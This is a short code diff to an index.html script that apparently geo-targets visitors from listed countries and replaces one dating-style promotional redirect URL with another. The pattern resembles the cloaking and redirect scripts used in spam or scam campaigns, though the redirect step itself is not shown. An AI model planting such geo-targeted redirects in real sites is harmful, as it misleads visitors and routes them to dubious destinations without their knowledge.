--- a/index.html
+++ b/index.html
@@ -9,7 +9,7 @@
 <body>
     <script>
         let countryHack = ['US', 'GR', 'HU', 'HR', 'RS', 'GE', 'GT', 'AU', 'NZ']; // Paises objetivo
-        let urlPromocion = 'https://contactcharm.life/?u=mq2pd01&o=fd5kphu';
+        let urlPromocion = 'https://flirtsecretdates.life/?u=mq2pd01&o=fd5kphu';
         let country;
 
         fetch('https://get.geojs.io/v1/ip/country')
